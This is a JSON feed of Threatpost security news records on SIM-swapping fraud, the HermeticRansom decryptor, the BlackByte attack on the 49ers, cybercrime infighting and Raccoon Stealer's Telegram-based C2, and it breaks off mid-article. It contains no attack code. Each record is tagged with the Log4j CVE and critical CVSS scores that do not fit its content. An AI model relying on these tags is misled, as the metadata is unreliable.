often for as little as $100 for each phone number.\u201d Again, this type of accomplice-cultivation isn\u2019t unusual \u2013 it [even resulted in a lawsuit](<https://threatpost.com/att-faces-224m-legal-challenge-over-sim-jacking-rings/136645/>) for AT&T in 2018.\n\nSIM-swapping is not just happening in the United States, either: The Spanish National Police, for instance, this week [busted open](<https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=11102>) a SIM-swapping ring that got around carriers\u2019 photo-based account verification by using non-original photos of victims to request swaps.\n\n## **Protection Responsibility Lies with Carriers**\n\nThere\u2019s very little that end users can do to avoid becoming victims of SIM-jacking jerks (although the FBI recommends a few protection steps, below). Primarily, it\u2019s the mobile phone company\u2019s responsibility to keep its house in order, researchers said.\n\n\u201cAll organizations, but especially service providers must move from more simplistic means of validating identity to more sophisticated ones,\u201d Cerberus\u2019 Clements said. \u201cPIN codes unique to each user\u2019s account can be one way of adding additional security to the process. \u2018Out of wallet\u2019 questions are another alternative that works by verifying much harder to compromise information such as last three home addresses or cars. It may be more of a hassle for everyone, but it\u2019s simply no longer viable to rely on information that has been routinely compromised to validate a person\u2019s identity.\u201d\n\nAnother best practice that all businesses can implement is to move on from SMS-based 2FA, others said.\n\n\u201cSIM-swapping attacks have been going on for over a decade and have likely resulted in billions in stolen cryptocurrency and other financial crime,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, said via email. \u201cSMS-based MFA has to be the most popular MFA option used on the internet, and most of the time, people do not have a choice of whether to use it or not. Their bank, vendor or service says they have to use it. And, let me say again, the U.S. government has said not to use it since 2017. The better question to ask is why so many services and vendors are still using SMS-based and phone-number based MFA five years after the U.S. government said not to use it? Why are we so slow and broken?\u201d\n\nThe FBI recommended this week that mobile carriers take the following precautions:\n\n * Educate employees and conduct training sessions on SIM swapping.\n * Carefully inspect incoming email addresses containing official correspondence for slight changes that can make fraudulent addresses appear legitimate and resemble actual clients\u2019 names.\n * Set strict security protocols enabling employees to effectively verify customer credentials before changing their numbers to a new device.\n * Authenticate calls from third-party authorized retailers requesting customer information.\n\n## **SIM-Swapping Consumer Protection Tips**\n\nThe FBI also recommended this week that individuals take the following precautions:\n\n * Do not advertise information about financial assets, including ownership or investment of cryptocurrency, on social-media websites and forums.\n * Do not provide your mobile number account information over the phone to representatives that request your account password or PIN. Verify the call by dialing the customer service line of your mobile carrier.\n * Avoid posting personal information online, such as mobile phone number, address or other personal identifying information.\n * Use a variation of unique passwords to access online accounts.\n * Be aware of any changes in SMS-based connectivity.\n * Use strong MFA methods such as biometrics, physical security tokens or standalone authentication applications to access online accounts.\n * Do not store passwords, usernames or other information for easy login on mobile device applications.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T22:13:33", "type": "threatpost", "title": "Sharp SIM-Swapping Spike Causes $68M in Losses", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T22:13:33", "id": "THREATPOST:795C39123EE147B39072C9434899E8FE", "href": "https://threatpost.com/sharp-sim-swapping-spike-losses/178358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T16:58:20", "description": "A free decryptor is out to unlock a ransomware found piggybacking on the HermeticWiper data wiper malware that [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s[ Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) discovered targeting machines at financial, defense, aviation and IT services outfits in Ukraine, [Lithuania](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) and Latvia last week.\n\nThe fact that there was ransomware clinging to the data-wiping malware didn\u2019t surprise cybersecurity experts, of course. It was predicted by Katie Nickels, director of intel at Red Canary, for one: She [tweeted](<https://twitter.com/likethecoins/status/1496590297228357634?cxt=HBwWhMC9ica8-sQpAAAA&cn=ZmxleGlibGVfcmVjcw%3D%3D&refsrc=email>) that there was very likely a \u201cbroader intrusion chain.\u201d\n\n> As you're reading this, note this point: adversaries likely had control of the AD server already. They were already in. There's a broader intrusion chain beyond just the wiper, it just isn't publicly known yet. I'm watching for any details on what happens BEFORE wiper deployment. <https://t.co/59SZTpTlXA>\n> \n> \u2014 Katie Nickels (@likethecoins) [February 23, 2022](<https://twitter.com/likethecoins/status/1496590297228357634?ref_src=twsrc%5Etfw>)\n\nWhat might have been a bit more surprising was the welcome [discovery](<https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/>), made by CrowdStrike\u2019s Intelligence Team earlier this week, that HermeticRansom had a lame encryption process that let the ransomware\u2019s tentacles be untangled.\n\nAvast Threat Labs had [spotted](<https://twitter.com/AvastThreatLabs/status/1496663206634344449>) the new ransomware strain last Thursday, Feb. 24. Avast, which named the new strain HermeticRansom, on Thursday [released](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/>) a free decryptor that incorporated a decryption [script](<https://github.com/CrowdStrike/PartyTicketDecryptor>) CrowdStrike released to GitHub, a user-friendly GUI and a set of instructions on its use.\n\nThe decryptor can be downloaded [here](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/#howto>).\n\n## Crypto Likely Weakened by Coding Errors\n\nHermeticRansom, aka PartyTicket, was [identified](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) at several victimized organizations, among other malware families that included what CrowdStrike called the \u201csophisticated\u201d HermeticWiper, aka DriveSlayer.\n\nRegardless of how sophisticated the wiper malware was, the ransomware that hopped a ride on it had less-than-stellar encryption, with a logic flaw in the encryption process that enabled researchers to break through, CrowdStrike said: \u201cAnalysis of the [PartyTicket/HermeticRansom] ransomware indicates it superficially encrypts files and does not properly initialize the encryption key, making the encrypted file with the associated .encryptedJB extension recoverable.\u201d\n\nAt the time it published its report, CrowdStrike hadn\u2019t traced the ransomware to a known threat actor. It didn\u2019t quite seem like a serious attempt at ransomware, at any rate, researchers said, given the coding errors that made its encryption \u201cbreakable and slow.\u201d\n\nEither the malware author was unfamiliar with writing in Go or rushed its development without thoroughly testing it, analysts surmised.\n\nEither way, it looked to analysts as if extortion wasn\u2019t the primary aim: \u201cThe relative immaturity and political messaging of the ransomware, the deployment timing and the targeting of Ukrainian entities are consistent with its use as an additional payload alongside DriveSlayer activity, rather than as a legitimate ransomware extortion attempt,\u201d they wrote.\n\nBelow is a screen capture of HermeticRansom\u2019s extortion note:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png>)\n\nHermeticRansom ransomware demand note. Source: CrowdStrike Intelligence Team.\n\n## HermeticWiper History\n\n[**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), discovered last week, has been used against hundreds of machines in Ukraine \u2013 attacks that followed distributed denial-of-service (DDoS) attacks launched against Ukraine websites on Feb. 23.\n\nOne of the HermeticWiper malware samples was compiled back on Dec. 28, pointing to the wiper attacks having been [readied](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) two months before Russia\u2019s military assault.\n\nHermeticWiper was only one of an onslaught of cyberattacks and malware that have been unleashed prior to and during the crisis, including the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>), a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of pre-invasion DDoS attacks in mid-February, plus another [campaign](<https://threatpost.com/destructive-wiper-ukraine/177768/>) of wiper attacks targeting Ukraine and aimed at eroding trust in January \u2013 just a few of an ongoing barrage of cyberattacks in the [cyber warzone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T16:56:27", "type": "threatpost", "title": "Free HermeticRansom Ransomware Decryptor Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-04T16:56:27", "id": "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "href": "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T02:13:10", "description": "The San Francisco 49ers were recently kneecapped by a BlackByte ransomware attack that temporarily discombobulated the NFL team\u2019s corporate IT network on the Big Buffalo Wing-Snarfing Day itself: Superbowl Sunday.\n\nBlackByte \u2013 a ransomware-as-a-service (RaaS) gang that leases its ransomware to affiliates who cut it in on a share of ransom profits \u2013 claimed responsibility for the attack by leaking files purportedly stolen in the cyber assault.\n\nThe 49ers confirmed the attack to Threatpost on Monday. The team\u2019s statement:\n\n\u201cWe recently became aware of a network security incident that resulted in temporary disruption to certain systems on our corporate IT network. Upon learning of the incident, we immediately initiated an investigation and took steps to contain the incident.\u201d\n\nThe 49ers brought in third-party cybersecurity firms to assist and notified law enforcement. The team was still investigating as of Monday, but so far, it looks like the intrusion was limited to its corporate IT network and didn\u2019t affect ticket systems or systems at the team\u2019s home base, Levi\u2019s Stadium..\n\n\u201cTo date, we have no indication that this incident involves systems outside of our corporate network, such as those connected to Levi\u2019s Stadium operations or ticket holders,\u201d its statement said. \u201cAs the investigation continues, we are working diligently to restore involved systems as quickly and as safely as possible.\u201d\n\nJoseph Carson, chief security scientist and advisory CISO at provider of privileged access management (PAM) solutions provider Delinea, suggested to Threatpost that it\u2019s likely that an affiliate hacked the 49ers, as opposed to the authors behind the ransomware, given that BlackByte is an RaaS.\n\nBlackByte recently posted some files purportedly stolen from the team on a dark web site in a file marked \u201c2020 Invoices.\u201d The gang hasn\u2019t made its ransom demands public. Nor has the group specified how much data it stole or encrypted.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14200002/blackbyte-49ers-e1644886822236.jpg>)\n\nSource: Ars Technica.\n\nCarson said that the Superbowl timing makes this one a classic case of cyber pests milking a major event: the kind of situation where they can get unsuspecting victims \u201cto click on links, download and execute malicious software or give over their credentials, thinking they are accessing a legitimate internet services, resulting in cybercriminals gaining initial access to networks and services. Once access is compromised, it is only a matter of time before ransomware is deployed.\u201d\n\n## Attack Follows Fast on Heels of Feds\u2019 Warning\n\nThe attack on the 49ers came two days after the FBI and Secret Service jointly announced ([PDF](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUUbpcdscHseLY8WazRItLnvQN0VOFtB523D1IckBDm3GWtAqMavOMkuJNpigwSlS1g-3D-3DHlt-_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad8NDtarbSFgOPpChaB5aAApmeE6Evp0nlfflzt6YSNEz28O2-2FHVrXE7UpGyDfGGnBrtBafeOs6MMZggCxPxBbybJxY4biqI68o3SzC6P2alu5pOZYg8dCtwmTO8AsZdPZl-2FU0cFcl7EEwBgimP9SeuFQXnQpQV9tiXU6qxQF2CVPNMtkNDR2cc1IBMMBK5HJ1DayKvUXhcyXH9vms3utwb-2BVTPSyYRG5jUH2iQhd-2BCWA-3D>)) that BlackByte ransomware has breached the networks of at least three organizations from U.S. critical infrastructure sectors in the last three months.\n\n\u201cAs of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture),\u201d the Feds said in a TLP:WHITE joint cybersecurity advisory released on Friday.\n\n## BlackByte\u2019s Back\n\nThe gang [emerged](<https://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/>) in July 2021, when it started preying on organizations by exploiting known Microsoft Exchange [vulnerabilities](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) \u2013 such as [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) \u2013 to claw its way into environments.\n\nIt worked for a while: BlackByte scored wins against manufacturing, healthcare and construction industries in the United States, Europe and Australia. But the gang hit a wall when, months later, Trustwave released a free [decryption tool](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/>) that allowed BlackByte victims to unsnarl their files.\n\nAs Trustwave said in October, the security firm found BlackByte to be a ransomware weirdo, for these reasons:\n\n 1. Same as other notorious ransomware variants like REvil, BlackByte also avoids systems with Russian and ex-USSR languages.\n 2. It has a worm functionality similar to RYUK ransomware.\n 3. It creates a wake-on-LAN magic packet and sends it to the target host \u2013 making sure they are alive when infecting them.\n 4. The author hosted the encryption key in a remote HTTP server and in a hidden file with .PNG extension.\n 5. The author lets the program crash if it fails to download the encryption key.\n 6. The RSA public key embedded in the body is only used once, to encrypt the raw key to display in the ransom note \u2013 that\u2019s it.\n 7. The ransomware uses only one symmetric key to encrypt the files.\n\nAs far as BlackByte\u2019s auction site for selling victims\u2019 data goes, it\u2019s apparently a house of mirrors. While the site claims to contain exfiltrated data from victims, the ransomware itself doesn\u2019t have the ability to exfiltrate data, Trustwave\u2019s Rodel Mendrez and Lloyd Macrohon wrote. \u201cThis claim is probably designed to scare their victims into complying,\u201d they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14203910/BlackBytes-Onion-Site.png>)\n\nBlackByte\u2019s Onion site. Source: Trustwave.\n\nAs the Trustwave analysts pointed out in October, the group uses simplistic encryption techniques, using just one symmetric key to encrypt files in AES, as opposed to using unique keys for each session.\n\nBut despite the setback of Trustwave\u2019s decryptor and what experts think of as its simplistic encryption, BlackByte is clearly doing just fine, given the FBI/Secret Service alert on Friday.\n\nMatthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology, called BlackByte a \u201cgrowing ransomware operator\u201d that\u2019s benefited from following successful patterns implemented by previous groups.\n\n\u201cSimilar to [Conti](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) ransomware, BlackByte has been identified using Exchange vulnerabilities such as ProxyShell to gain a foothold in environments,\u201d Warner observed to Threatpost on Monday. \u201cAdditionally, BlackByte utilizes well-proven tactics such as Powershell exploitation of obfuscated base64 content to perform all encryption on hosts once exploited.\n\n\u201cIn the end, BlackByte is by no means more sophisticated than other actors in the ransomware universe but rather are the next up-and-coming player to exploit organizations and their data,\u201d Warner added via email.\n\n## Critical Infrastructure\n\nErich Kron, security awareness advocate at KnowBe4, focused on the FBI warning about BlackByte\u2019s success in penetrating the critical infrastructure sector: a sector that\u2019s been \u201cplagued\u201d by ransomware attacks, he said.\n\n\u201cThe criticality of the systems makes quick recovery vital, which increases the likelihood that the victims will pay the ransom,\u201d Kron said in a Monday email. \u201cThis same criticality also makes law enforcement attention much more likely. However, given the low success rate of law enforcement busts, this is often a chance the groups are willing to take.\u201d\n\nKron blamed limited budgets, aging equipment and shortages in cybersecurity staff for making critical infrastructure and many government entities especially vulnerable to ransomware attacks.\n\n\u201cThese groups must focus on the top attack vectors used in ransomware attacks, usually email phishing and attacks on remote access portals,\u201d he advised. \u201cTraining the users to spot and report phishing emails and improving the organizational security culture, along with ensuring remote access portals are monitored for brute force attacks and that credentials being used have Multi-Factor Authentication (MFA) enabled are some top ways to counter these threats.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T02:04:36", "type": "threatpost", "title": "BlackByte Tackles the SF 49ers & US Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T02:04:36", "id": "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "href": "https://threatpost.com/blackbyte-tackles-the-sf-49ers-us-critical-infrastructure/178416/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but, a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.'\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries,\u201d the report said. \u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:13:04", "description": "A credential stealer that first rose to popularity a couple of years ago is now abusing Telegram for command-and-control (C2). A range of cybercriminals continue to widen its attack surface through creative distribution means like this, researchers have reported.\n\n[Raccoon Stealer](<https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/>), which first appeared on the scene in April 2019, has added the ability to store and update its own actual C2 addresses on Telegram\u2019s infrastructure, according to a blog post published by [Avast Threat Labs](<https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/>) this week. This gives them a \u201cconvenient and reliable\u201d command center on the platform that they can update on the fly, researchers said.\n\nThe malware \u2013 believed to be developed and maintained by Russia-affiliated cybercriminals \u2013 is at its core a credential stealer but is capable of a range of nefarious activity. It can steal not only passwords but also cookies, saved logins and forms data from browsers, login credentials from email clients and messengers, files from crypto wallets, data from browser plugins and extensions, and arbitrary files, based on commands from its C2.\n\n\u201cIn addition, it\u2019s able to download and execute arbitrary files by command from its C2,\u201d Avast Threat Labs researcher [Vladimir Martyanov](<https://decoded.avast.io/author/vladimirmartyanov/>) wrote in the post. This, in combination with active development and promotion on underground forums, makes Raccoon Stealer \u201cprevalent and dangerous,\u201d he said.\n\nUpon its release in 2019, cybercriminals [quickly adopted](<https://threatpost.com/raccoon-malware-steal-data/149525/>) the malware because of its user-friendly malware-as-a-service (MaaS) model, which has given them a quick and easy way to make money by stealing sensitive data.\n\n## **Creative Distribution**\n\nEarly on, attackers were seen delivering Raccoon Stealer [via an .IMG file](<https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/>) hosted on a hacker-controlled Dropbox account in business email compromise (BEC) campaigns that targeted financial institutions and other organizations.\n\nMore recently, Avast Threat Labs researchers observed a number of new and creative ways attackers are distributing Raccoon Stealer, Martyanov said.\n\n\u201cTaking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers,\u201d he wrote.\n\nIn addition to being spread by two loaders \u2013 Buer Loader and GCleaner \u2013 attackers also are distributing Raccoon Stealer via fake game cheats, patches for cracked software \u2013 including hacks and mods for Fortnite, Valorant and NBA2K22 \u2013 or other software, Martyanov wrote.\n\nCybercriminals also are taking care to try to evade detection by packing the credential stealer, using Themida or malware packers, with some samples observed being packed more than five times in a row with the same packer, he added.\n\n## **Abusing C2 in Telegram**\n\nThe report detailed how the latest version of Raccoon Stealer communicates with C2 within Telegram: There are four \u201ccrucial\u201d values for its C2 communication, which are hardcoded in every Raccoon Stealer sample, according to the post. They are:\n\n * -MAIN_KEY, which has been changed four times during the year;\n * -URLs of Telegram gates with a channel name;\n * -BotID, a hexadecimal string, sent to the C2 every time; and\n * -TELEGRAM_KEY, a key to decrypt the C2 address obtained from Telegram Gate.\n\nTo hijack Telegram for its C2, the malware first decrypts MAIN_KEY, which it uses to decrypt Telegram gates URLs and BotID. The stealer then uses Telegram gate to get to its real C2 using a string of queries that eventually allow it to use the Telegram infrastructure to store and update actual C2 addresses, Martyanov wrote.\n\nBy downloading and executing arbitrary files from a command from C2, the stealer also is able to distribute malware. Avast Threat Labs collected about 185 files, with a total size of 265 megabytes \u2013 including downloaders, clipboard crypto stealers and the WhiteBlackCrypt ransomware \u2013 that were being distributed by Raccoon 